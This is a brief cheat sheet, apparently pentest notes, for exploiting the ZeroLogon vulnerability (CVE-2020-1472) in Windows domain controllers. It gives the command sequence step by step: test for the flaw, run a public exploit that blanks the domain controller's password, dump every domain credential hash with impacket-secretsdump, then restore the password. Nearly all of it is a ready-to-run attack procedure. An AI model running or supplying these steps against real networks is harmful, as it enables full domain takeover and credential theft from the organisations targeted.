zero logon exploit

Information

This exploit changes the DC Password to an empty string.

• SecuraBV/CVE-2020-1472/zerologon_tester.py

• python3 zerologon_tester.py DOMAIN DC_IP

Exploit

1. Clone dirkjanm/CVE-2020-1472

2. python3 exploit.py DOMAIN DC_IP

Dump hashes

• impacket-secretsdump -just-dc DOMAIN/DC_HOSTNAME\$@DC_IP - no-pass

Restore

1. impacket-secretsdump administrator@DC_IP -hashes HASH_FROM_DUMP

2. Note the plaintext password plain_password_hex

3. python3 restorepassword.py DOMAIN/DC_HOSTNAME@DC_HOSTNAME -target-ip DC_IP -hexpass PLAIN_HEX